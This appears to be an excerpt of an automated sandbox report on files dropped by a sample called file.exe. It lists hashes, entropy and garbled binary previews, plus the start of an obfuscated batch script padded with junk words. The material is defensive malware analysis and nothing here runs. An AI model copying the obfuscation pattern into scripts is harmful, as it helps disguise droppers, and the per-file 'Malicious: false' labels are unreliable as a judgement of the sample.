                                                                                                                                                                                        Preview:%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.r.r.r.r.r.r.r.r.r.r.r.r.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.r.r.r.r.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.r.r.r.r.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):8192
                                                                                                                                                                                        Entropy (8bit):6.565250571851243
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:yBezXZ/doXlcuTbAryvtVaVarRS3/LMJ0eAcAAdG7pZeU:yCXBe3k+3aVkRS3/LTeAtAdyneU
                                                                                                                                                                                        MD5:A2F21D2F4986BD778F3A4C5A4A2D7DF7
                                                                                                                                                                                        SHA1:DF47F24CB09C3B2E282066A31C77A019BABB6FF3
                                                                                                                                                                                        SHA-256:C0803AC9E0A11189CBB6ED62D6444DF80AB3C399534453D7E03CD3E59F9669DA
                                                                                                                                                                                        SHA-512:35D255799762F49552C37754B386EA1D92FF8213AD6666473A1AF59E7A707E8098CE5DA1E44FF175375473120C942071479971717A5F8ED7BFAEA96D1AE9C6E9
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:t...Q.P.j<V...YY..^...U..E...8P..D.I.]...U..E..H...t..u....u..u..u..u.Q.P.....@..]...U..S..M.j..S.."...Y..x4.}...C(u.VW.d.J......._^..P.u...\.I...y..C......C.........C.[]...U..E..H...t..u....u..u.Q.P.....@..]...U..E..H...t..u...Q.P.....@..]...U..VW.}...........F.Phd.J.W....W.P._^]...U..E..H...t .u(...u$.u .u..u..u..u..u.Q.P.....@..].$.U.............V..h....P.v.....I...tkW.~.Wj.......P..4.I...xHj.......P.7..0.I...x..F......%j.......P.7..,.I...x..F........F......F....J....F._....@...F.^..U..E..H...t..u....u.Q......@..]...U..V.u..F8P..@.I...u...t.Q......3.^]...U..QV..~..t_.F..M.QP...R...xN.~..u..M..q...A..q.P..A.PQ..(.I.. .~..u..M..q...A..q.P..A.PQ..$.I..F..u.P...Q0^..U..Q.E.SV3.W...]..w....sL.._.._.._.._.._....G .....G$9].td.u.....Vh.....w... .I...xI9.tE...f....E.P.6.u.VS....I...x).E..U.R.w.hd.J...P...M...Q...R...x..E..G..._^[....V..~.....sL.tF.F.W3.9x.v..F..4.....F.GY;x.r..v.....v..~...j..v..-....v..l......_.N...t...Q.P..~$.t..F.P...Q.^.Vh'.F..q..6j.Q.............QV.
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):18432
                                                                                                                                                                                        Entropy (8bit):6.44990963723728
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:ZMI4kBgHb0RRyOrhZbGU3Rm08LmP/Mbs3uCYm71LA:SkBRR9rlRmLmP/puCYmBLA
                                                                                                                                                                                        MD5:E3AD485926D576272BC3834F4F711A73
                                                                                                                                                                                        SHA1:E87B64A5E13F6CF404615844235E50572FD6BB78
                                                                                                                                                                                        SHA-256:DE36B296029F55670C9D97F1864F1B20CF481E20C396E4B564344C0A4198A9CB
                                                                                                                                                                                        SHA-512:3C5C1CA29F6CD22E202FAD8AB9E4EFB6CF9BDFF399CB7FD3A29B257BDA76D72E625718E2E5A2486ECDECCFADF40326FB7DF04C4E51C726452C806442CCC3E38D
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:.b..R.E...c...M....~...E.PV.4c..........t..u..u...............h.tL.P.............M.P.\r...u..t.V.M..*..h..I..M..*...M..~...}..|<V.M..vD..j..u..M...l..h\tL..M..a*...E.P.M..:..h..I..M..H*..hltL..M..;*...E.P.M..h:...=d#M..t@.}..t..u.V.u..u..u.h.zL..#d......5.u.............h.zL...d.......h.....u..u..5.#M.....I... ..........t..]........M..\#M...{...M..{...M..{...M..{...M..{.._^[....U... .......VW3.3.f..............Vh....PV...u...0.I.P..RVh........I.........P..p...._^..U..E...x...x...;.}.P......M..0..C.......M...z..2.]...U....V.u...M..p...E.P............M...z..^....U.....=a#M..V..t...M......3...3.8..)M.t.9............P5M.@.P5M.9.....u.8.....u......t.....I.........3.j.QQ......Q.z.}...........)M....t8;.D)M.}).@)M........t..x..t..M.Q.p..0....I...t..-...)M...E..(M.P.....u..E.P..T.I..E.P..L.I.j.3.PPP.E.P....I.....t.....................=b#M..u...g#M....b#M....................u.3.@...=g#M..t.j.X..3.^..U..Q.}..SVW..........d......E.t..u.....u.........}..t...3M...........4
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):67584
                                                                                                                                                                                        Entropy (8bit):5.798228755646301
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:jUzSLKPDvFQC7Vkr5M4INduPbOU7aI4kCD9vmPukxhSaAwuXc/mexi:Az08QuklMBNIimuzaAwusP8
                                                                                                                                                                                        MD5:402E097B13C55A275C6B549572D52FFD
                                                                                                                                                                                        SHA1:93ECE3A1B0569F3B1D3F827ABDD687B95A202801
                                                                                                                                                                                        SHA-256:A98131D193BDA98FF749D4669A081F856AEDF7A87FA3849F02BED4A3DA530BD4
                                                                                                                                                                                        SHA-512:12FB94AFAB7C09DE05A696ABAE70DCDFD4120BD9526865B0FBE0F916AF8A30B39FBA2A32F83DF077A1620D2844EC5404B9A54492CB44B523E835E0FEA49E68C9
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:._.V.?(FN\.\...:7.q.?..B..:..f..m...?...<.......4..?..a.6.u....-..?.)]7...."4.L...?......<....E..?..V.#..*..!...?x.0.i.^...P..1.?.y_....-.a`.N.?...z.H<W...Aj.?v.d.K..<.<.....?.b....s<....*..?V...b.<'*6...?.B.C}<.......?3xj...<.,.v...?.WY.....Bf....?.i.v...O.V+4.?.<...z....].Q.?....h...'.6Go.?....,..<......?...[.<)TH....?.GF.L2.<.FY.&..?..i..K<<H!..o..?].0...<..v....?G.V.B..U:.~$.?..@~.... ..4FC.?2..u<H..%"U.8b.?3.Y.....s.L.U..?d>.D.8`<.;.f...?Ud..4.....u...?...gV.r./.e<...?..<h:.k...Q.}..?...%.<..t_..u..?.z..Gn..t..H.?.?;.el....gBV._.?.m1WY$..?].Oi..?,....f.<...s...?/...w...2.0....?.M..L..<bN.6...?~y...]p<..>T'..?*.mb.|....L..%.?.2...L....#F.G.?..A.....D..h.?.......f....?:.|...<.*B..?&K.V..<.D..2..?...2^.p.6w.....?l....<....[..?#%X.y.....77.?.~..._g..R..DZ.?9.|Kv.PN..}.?..|[......p..?2...s.......?..q.F||<##..c..?nL.x.$x<e.]{f..?2..]IY..3-J.0.?.6.}\0.<]%>..U.?.A..n/..X.0..y.?.c..~.<..yUk..?1......<z..k..?.l..4.....Z....?..]4..<f..)...?
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):55296
                                                                                                                                                                                        Entropy (8bit):6.667223003791237
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:uoHdMJ3RraSXL21rKoUn9r5C03Eq30BcrTrS:vHSBRtNPnj0nEu
                                                                                                                                                                                        MD5:209FA27E972D3C51EC64CE3ECB581BC7
                                                                                                                                                                                        SHA1:A340D641D3253008F0910A8E89318FC93F4FDF84
                                                                                                                                                                                        SHA-256:5407B3EBB6000281EE905FD3BDD6B96436B8FB232C06E1D5B46C9878F638CDD8
                                                                                                                                                                                        SHA-512:6BEFA418099987E49789DE42E42AD8D3141BE94B5F81F1E5CCD4AF2DB837B12FBF575A855B41BB01B8FD88B62F51546A3B14F9F0558B94D7FC2A677F91DB3D5B
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:E.9J0~>.M..P.S.....Y..u..E.3.f9LX.u..U(...U(G.M..B4..A...M.;z0|.3.u.;z0...........u.G..M.].;BL~..BL;z0}:.].M..B4S..A.M..Q..M..q...Y..u..M.f9DY.u..U(FG;z0|.].M.U.;u.~..].Cf.r.f.B.........].f.B......}.....'...E.jRZf9.ue.U...~=j0_...Pf;....&..f;.L......&...........&..k.......E.B;.|..u.......U......f.J..M(f.B..u..h.........&..S.$.L....F5..Y.....&...U.......].f.B..u....U..s.3..u.......E.}..M(.^1..j+Y;.t%j-Y;.t.....U../...+..j9Y.U.;....+..j)X.E...J....E.E.A|........A\j}_...........M(.A\....}.u.....3....j)...u.Xf9....%..........V...j=.u.Y...f;.t.j>Yf;.t.j<Yf;....$.........j)Yj>.M..3.Yf;....U.......U.3.E..jv..T...Xf...u.j.X....x.....u.j0_....U.f;.r=....j9Xf;.w.k...w......u.......;...5$.........f;.p...s.U.j)Xf9...$$..f...M(j.X..].E.+A...@f..3.f.B.j.X...]2..............F.j!..Z;.......j=Zf;............f;....#...E(..j.[..@.......#...r....j0.u....Y.].u.f;.r.j9Yf;...R$.........f;.w7.M(..j.[.y.......U...8t..r..u........u.f;.h...v.].M.+M....},..M...5....U(j<_j>.B
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):43008
                                                                                                                                                                                        Entropy (8bit):4.951310419857991
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:IKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R:IKaj6iTcPAsAhxjgarB
                                                                                                                                                                                        MD5:F57DC13D2A4869467E378CBDE8AD95CD
                                                                                                                                                                                        SHA1:2116BE8115B8DDD0F9DD7021DCCD76B518F22FE2
                                                                                                                                                                                        SHA-256:B7E3F2E9F08FCF3B5EA94F9FEFE73275567A0F5C11263901546C6667A429CC5C
                                                                                                                                                                                        SHA-512:B2B2D409232C87F525FA9B06060F18DB48D634AEF93B22B805C940081CCDD5CD1898A1EF34099234047FEC55AC6145180756FCF2C9B4A70E6067CB99B376050B
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{.{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{.............................................................................................................................................................................................(.......(...........(.......(.......(...!...A.L.T...B.A.C.K.S.P.A.C.E...B.S.....D.E.L...D.E.L.E.T.E.....D.O.W.N.....E.N.D...E.N.T.E.R...E.S.
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):45056
                                                                                                                                                                                        Entropy (8bit):6.622916860548392
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:qRBcSyRXzW8/uC9gHOGCP/wJv5iKpnTBw9RXVF2GUrtAW93Uq1oD3OQOcqkLPlHm:YcSyRXzW8/uC6LdTmHwANUQlHS3cctlN
                                                                                                                                                                                        MD5:10F390540E2F28AF21BE71BEE91F887A
                                                                                                                                                                                        SHA1:DDF48677896D773768FCFE5A1C2E326722811C01
                                                                                                                                                                                        SHA-256:B1CE10172DFC8C66021EC8E94A5774681D73E9FBED7CF52D21EC8B1755D0617B
                                                                                                                                                                                        SHA-512:91C4A011EF0DCB6329A79CF0472ABF5FC1DF30FC75B803BDE5C3FA892C5FA893517A82C44856825B75DFD5CA0F02B8F06B3B825A89FD2FC5364A60435910F4EF
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:.M.%....=....u.............%...............M.E....@.K....@.K.9U.r..@.;.t;..;.s.}........E....E.@P.u...V.u..u..*..........Y........}..........E...@..P.u.V.u..u..................E.9E.......;~|.............}....t+..%....=....u...............................$t&..@t!..`t.......r.......v.......s.3........;E........E....E.@P.u...V.u..u..I..........S.................E.9E......;~|..9..........}....E..t*%....=....u.............%............................L.........E.,K.......K..F|.M.;........U..}......E.....t/..%....=....u!..G.......%..........E............u...............L.........E.,K.......K............1L..u.t..E.M.<C.F|...;...m......F|.].......t ;.r.;.....v..Fh.............{....E....E.@P.u...V.u..u....................V....+.;...;...f..f;F4...........<...f.G.f;F6....................%....................E.......u..............u.....$...E..u..E...w4t..........A..........2;~|.....f.?.......x...........t.................~l................w<..r.........w...d......
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):41984
                                                                                                                                                                                        Entropy (8bit):6.6824851170406045
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:wULYvwTiKwt3U2ukChn0kHR+h+Op6QD36wJ72KmIsbrl2tUGxBWmUJNmoKzV:woJiKwtk2ukC5HRu+OoQjz7nts/M26N9
                                                                                                                                                                                        MD5:5251998BA3FB49ACDE1015413ED43384
                                                                                                                                                                                        SHA1:54AA5290A0F0832AEC2DF834E94672EEDF1CFB29
                                                                                                                                                                                        SHA-256:FF68F50AB8FEE781F91A3FE0D175A97E2126B03AEF3EC21139224330FBF3D330
                                                                                                                                                                                        SHA-512:25C0AE18D6EA7B8E14B367391F0B7B53A8BD02F182A87E6FDE642CE68AFCC4E51DCA99C9A3CFD803ED8E2B5334F157E8D66502566F04EE7E1BFD690F882DBFAA
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:H..V..N.....F.^]...U...,SVW...M.}..."...u..M..w..^..]..(....E...y:h....j.SP.u....6.<.......y...3....V3.M.SW......E...E...3..E...j.V.u.u...j..u..0......v..M.E.+.PW.}.W.....E.P.M.....9u.t9.u..M..u....u.C.u.E...t.;.u..G..M.+.PVW.^....E.P.M..G.....t..E..P.\!...M... ...M... .._^..[....U....SVW.M...!...u..}....E..X...;_.......3..E.8E.t.S.....f.8{u..C..E......3..E..M..g....5P...y......P.x...Y..t&..Q.E...A.....X....M....P.......;G.|..u.......}....Yt..}..t!..;G.t.P.......f.8}u......E.......M..*..._^..[....U..V....D.I..&....v...b...E..Yt.j.V.b..YY..^]...V....u..j.V.b..YY..^...U..W......tV.G.V.0......u..p.....3.j.Z............Q.b...O....1V.....u.V.....G..0.kb...G... .0^_]...U..V.u.Wj.h..I.V...=........u....3.@_^]...j.h..I.V..........u..G....j.h..I.V..........u.S.N,.b.....V...V...V.7...Yj"[..LF.f;.t j'Zf;.t....f;.t.f;.t..O.V...P...f9.t.3...3.f.LF..F..O.P...R.3.GV.a..Y..[.S...U..S.].VW.}...j.Z.49.A...3.u..F..........Q.Sa.........VQW.Xq...33..M....f..>..~.f1.G@;.|..._^[
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):35840
                                                                                                                                                                                        Entropy (8bit):6.586089463725046
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:NGXZVfmlqTmN5WAQIGK2ud5lS87uzh7JCQ/sE7mOB6XSHuc:QXnP94SGGLpRB6M1
                                                                                                                                                                                        MD5:A05193BF1E68B3FA200D71C3E81B5B42
                                                                                                                                                                                        SHA1:6A7F84ED1E3BEA9C7F300F8F4496CB16178FCCB8
                                                                                                                                                                                        SHA-256:71EAD8AA39BA5AB49FED0DD3145F89F5F75EAF0929100948A6B280F22DFB6942
                                                                                                                                                                                        SHA-512:6AD9D9C9408C45A077238754D379B1588A38E0F6E87E6CBFCB7E7BA15507A3C59FC0C54FDC60A5FB413362735E0EF82FBCB844E246A2F5FA02BF4D095DDCE48E
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:.u..u.P.E.P.u.W..................A.j.Yf9H........E.HO..\.....E...b.....e.....E...Z.......\....>.....`....E..E.....V...;........I...3..3....u.3..u..u..u.RQ.u.S.a.....x...M.......M........t..........h.........M.......\........M....._..^[...............2....M..U................A.j.Yf9H........}.............A.j.Yf9H........E.E.}.M.PG.|....E..E......E..E.}.h...PG.[.....l....E......M..U.9E.............................E.HO.}...E........}...E..........M.......E..E.E..x.;...9...Vh..........A.j.Yf9H........M.IO..h.....M.tF..q.....E.u?....h....q.....l....M..E..x.;.......Vjx.....]..@..o....]...@..J@.GJD..M@..M@..L@..M@.fN@..M@..N@.uK@..K@..A...u..V.j...SVW..3.8_...o...8_.u..G.j.P.p......YY.w.._..._^[....U..V..~....U...j.....Y.M......N..H..F...^]...U..E.....;....}....\....}..u4.}....k....}....j....}....i....} .u..}$...1...3.]. .j.jw.&...j.js.....U...lSV3.M.W.]..o...u..M..E...I..]..]..]..].......M...$M..E......6m..V..#M..n...E.P.M...9..h..I..M...b..Sj..E.P.E.P..m...M.
                                                                                                                                                                                        Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):31744
                                                                                                                                                                                        Entropy (8bit):6.494112094592876
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:768:hbUb5t7i4KePMiJsS+dbzWoMFfTu8kbowGI9KgvoA3tnTnb+6h+HMU64k:ObLmbZzW9FfTubb1/Dde6YF64k
                                                                                                                                                                                        MD5:2F178344B946AC6B7EEC96CA3702FDFF
                                                                                                                                                                                        SHA1:F033AC7AF2EA73F217F881E1884311A58D027FE4
                                                                                                                                                                                        SHA-256:55083B8BC8F1776E7202225EA8896B0377B669A9C853D09AA294853705E08D60
                                                                                                                                                                                        SHA-512:8F72CE152CFA5386E20264A9F68C1442044E20C38498547D5DFEFC731807FD27240FBE214CCD4D0E7AD492C6F5721EC5D1142177AA2ECA1105761103637F5830
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:D9.t..@8.@...L$.......L$(......L$8....._^3.[..]...U..V.u....i.....u..u.........&..F.............j...:..3.^]...U..V.u....-.....u..u........&..F.............j..:..3.^]...U..V.u..........t.........$....u..u....[....&..F.....3.^]...U......@...SV..M.h..I..b...u.....+..j....K+......?...I...Y..A...y...t..@8..P.....t..@8.@......y...A.t..@8.@...G.L$..1(...L$.....D$.P.......L$..0.....M..D$.P..q...L$.....L$...%..^3.[..]...U..V.u..........u;...H..|1...D1.t..@8.@......|1...D1.t..@8.u....@...<....&..........u...W.8.$....>_.F.....3.^]...U......$SVW.u....v.....u..u........3.C............D$.3.CSP..9..:........M..5s..j...SV.y...L$..D$,.d$4.j.SPV.L$<.\$H.Y.......L$ .....D$.3.S.D$$.D$$SPV.|$8.\$<.........L$ .b....D$.+D$.j..D$$.D$$SPV.|$8.\$<.........L$ .4....D$.+D$.j..D$$.D$$SPV.|$8.\$<..~......L$ ......8.u.........&..^....H..|9...D9.t..@8.X..|9...D9.t..@8.@.._^3.[..]...U.......V..M.h..I...`...u..........u....H..|1...D1.t..@8.@......|1...D1.t..@8.@...a.L$..6..........D$.P..8....u....H..|
Process: C:\Users\user\Desktop\file.exe
File Type: data
Category: dropped
Size (bytes): 69004
Entropy (8bit): 7.997776262524317
Encrypted: true
SSDEEP: 1536:etPRR1weNQJNPlnnKHw7TC+5f3eTjmoV4ch2RBV49z8F3Y:4P3m1UHgP1Nchkg9z8F3Y
MD5: A2F118A6F00B962B7C579A261C7804C9
SHA1: 665111A5CE8FE215E18A92C247C84E887C2D4D61
SHA-256: 8630177ED24B4143FD5D72584E01FE51CB3B407D899638F3FE95D734F389A789
SHA-512: 3AAE946543229B59CDD9C792B48E06EF00AF10EE455FA17F1E0571E1321C8F86FC2C80DF35D276BC050954BC70AED11A3FE845B4A767DC96A6F303A23F90DCEE
Malicious: false
Process: C:\Users\user\Desktop\file.exe
File Type: data
Category: dropped
Size (bytes): 40960
Entropy (8bit): 6.7049790695127465
Encrypted: false
SSDEEP: 768:NdoXSMf17+sVXnQkdFLILu8rbPDmhdimkIXqURPN2mldrfa04Vr:Eh+I+FrbCyI7P4Cxi/
MD5: 0610AF0059338136BF8C338F9DF9F4E9
SHA1: AE56E66B0643DD15D02C6E49E419D0720A71A2CF
SHA-256: 8B39EAC835DB993685CCC47FA51581D0481FEB82181A024E8DC82D0C6998D5A2
SHA-512: FEE68EF1F022CB0B791B644DB311EDAF94667AD7460455BAD304838947E79D7262099FC7288709D9BFC5ED9D59AC1EDE415FE4053ABCF72AD78462D0831327F3
Malicious: false
Process: C:\Users\user\Desktop\file.exe
File Type: data
Category: dropped
Size (bytes): 68608
Entropy (8bit): 5.857481787411282
Encrypted: false
SSDEEP: 1536:lL6wy4Za9IN3YRYfv2j62SfuVGHj1vtK7h6R8anHsWccd0vtmgMbF9:lewy4Za9coRC2jfTq8QLeAg0F9
MD5: 56E8E3FD9ABF7E1E0275B2E838A5EF57
SHA1: ABDC8B68B01D5910485A550BBEDA6DC6EC65C20A
SHA-256: 42AFF549FF3F6BE7336B9AE9A616FCC927E2CF75DC09D4A9A2E51F33968DFF18
SHA-512: 6E261AB2509A146D3E4790149C62A970F7EDAFC04AAC1AF227FD887C506E02351FBCBCCE47C7B41FF51622D5267255B223C34D1F52CF52C55B63003EDABB2D6E
Malicious: false
Process: C:\Users\user\Desktop\file.exe
File Type: data
Category: dropped
Size (bytes): 62464
Entropy (8bit): 6.975790841576853
Encrypted: false
SSDEEP: 1536:YWyu0uZo2+9BGmdATGODv7xvTphAiPCh1:YWy4ZNoGmROL7F1G7h1
MD5: 1DB6805B4802F7E943EB19217E2E58D4
SHA1: 0354FD0DC9ED3963713E6BA0F1DB2249F36A2425
SHA-256: CEB583ACEFB2443A5BAB27F21F6F15668FC853AA85F148787DDC8DAB28F36CAC
SHA-512: 7A6CA112ADC68347BF3AADC469650491476FE245642DE16CADC031CF49622D79965FB37E2D8E4B54DD723AE08A95F28DA74C35B6C10CDC4BBA1276AF0C13D64C
Malicious: false
Process: C:\Users\user\Desktop\file.exe
File Type: data
Category: dropped
Size (bytes): 36864
Entropy (8bit): 2.6516860651113467
Encrypted: false
SSDEEP: 192:xjLHdAWeg1Q319sx9kaxCV6qTb4Ph5qRtFV82rcx/hQ4v3U+mX9nhi:xjLWWel319stEjFtr+/hdvEA
MD5: 4B932AA83E6B9828C48EFC6C32F52A25
SHA1: 36396AE5C0C3A2C46F7BE2439EDD654465CA5505
SHA-256: 8D43CD6EE32A87B53944D2EF0637C629925C67B664CDC49B010C0D9BCCBDE87A
SHA-512: 53116BD05A8C3D3B99821FB3CB3A96F1397E82A92F5EE03F347FE26EB9B700482D0207241F17D6BA94FB5769B34B2CF8153BC7D1C2F96397A8E2BA4CB89057F9
Malicious: false
Process: C:\Users\user\Desktop\file.exe
File Type: ASCII text, with very long lines (1326), with CRLF line terminators
Category: dropped
Size (bytes): 25995
Entropy (8bit): 5.037814634170457
Encrypted: false
SSDEEP: 768:q39ZC1DqgAISNC4Pp0hvVZeaTclMlEIHDE7F++IqxvSrCaJy7T:WvCEXISNr0fZeaTYojE7F++IYvSrjJy3
MD5: 6969D2308EE5AFE17CED449AFE8F6FBE
SHA1: 878D4F2B3D43265F31A0D26669D5B4AB0A02BEE5
SHA-256: C2A330ADBFBCAFC43FD6A1C0E2738F4DA8419719EFC3FA72FC3D519024A5A701
SHA-512: 832F28350EDBA8C58AE50B7861C18A550C2774BEE4F5BD42D69E87C8E4E2CB61A9E28976A8162CE3020C7636809FB03A2FDEA708EB7A8F5FD0161F3D3B501E66
Malicious: false
Preview: Set Medicaid=u..hWlWallet Eq Feed Ty ..bYParties Funds ..GlqRFingering Believed Raise Short ..iVFeDispatched Ultimate Wiley Impression Rental Map Characteristics Side ..exDCooked La Automation Each Guitar Gl Timing Colony ..LprpGenre Johnston ..xLUcAllowing Convenience ..GaGmbh Incorporated Sci Amazing Rrp ..Set Downloads=h..QSDame Cartridge Online Information Costs ..zDsOReached Philippines Pockets ..xqnSRussia ..vPUnable Cedar Elections Thumbnails ..rIYSRequiring Serbia Rely Sing Guest ..ewKeCage Ford Ben Teams Launch Stay Verde ..MlLRDrives ..tIGPlaced Repair Seminar Columbus Ul Naples Dm ..Set Payroll=m..LqReferrals Paste Sharing Saw Contributed Adverse Constant ..LlEngland Angle ..ICMMGrow Accreditation Global Wedding ..poDebut Consumers Ka ..wpZImages ..TTHJurisdiction Vice Maiden Positive ..UGFyLinked Fax Oak Publication Fish Plots Jeff ..Set Nine=...YqkKBruce ..TkStylish ..MYBvPaying Epinions Discrimination Playing ..tNZMobiles Edited Report Robots Yards Dramatically Spanking .
Process: C:\Windows\SysWOW64\cmd.exe
File Type: ASCII text, with very long lines (1326), with CRLF line terminators
Category: dropped
Size (bytes): 25995
Entropy (8bit): 5.037814634170457
Encrypted: false
SSDEEP: 768:q39ZC1DqgAISNC4Pp0hvVZeaTclMlEIHDE7F++IqxvSrCaJy7T:WvCEXISNr0fZeaTYojE7F++IYvSrjJy3
MD5: 6969D2308EE5AFE17CED449AFE8F6FBE
SHA1: 878D4F2B3D43265F31A0D26669D5B4AB0A02BEE5
SHA-256: C2A330ADBFBCAFC43FD6A1C0E2738F4DA8419719EFC3FA72FC3D519024A5A701
SHA-512: 832F28350EDBA8C58AE50B7861C18A550C2774BEE4F5BD42D69E87C8E4E2CB61A9E28976A8162CE3020C7636809FB03A2FDEA708EB7A8F5FD0161F3D3B501E66
Malicious: false
Preview: Set Medicaid=u..hWlWallet Eq Feed Ty ..bYParties Funds ..GlqRFingering Believed Raise Short ..iVFeDispatched Ultimate Wiley Impression Rental Map Characteristics Side ..exDCooked La Automation Each Guitar Gl Timing Colony ..LprpGenre Johnston ..xLUcAllowing Convenience ..GaGmbh Incorporated Sci Amazing Rrp ..Set Downloads=h..QSDame Cartridge Online Information Costs ..zDsOReached Philippines Pockets ..xqnSRussia ..vPUnable Cedar Elections Thumbnails ..rIYSRequiring Serbia Rely Sing Guest ..ewKeCage Ford Ben Teams Launch Stay Verde ..MlLRDrives ..tIGPlaced Repair Seminar Columbus Ul Naples Dm ..Set Payroll=m..LqReferrals Paste Sharing Saw Contributed Adverse Constant ..LlEngland Angle ..ICMMGrow Accreditation Global Wedding ..poDebut Consumers Ka ..wpZImages ..TTHJurisdiction Vice Maiden Positive ..UGFyLinked Fax Oak Publication Fish Plots Jeff ..Set Nine=...YqkKBruce ..TkStylish ..MYBvPaying Epinions Discrimination Playing ..tNZMobiles Edited Report Robots Yards Dramatically Spanking .
Process: C:\Users\user\Desktop\file.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 6.660371238879616
Encrypted: false
SSDEEP: 384:Vml6QdugR9Qf7AOaosQEDfYmFdn3TJicB:0v7Qf0VosQE7YmFdnd
MD5: 24FF1D39A661D345C3AB496FC46350A0
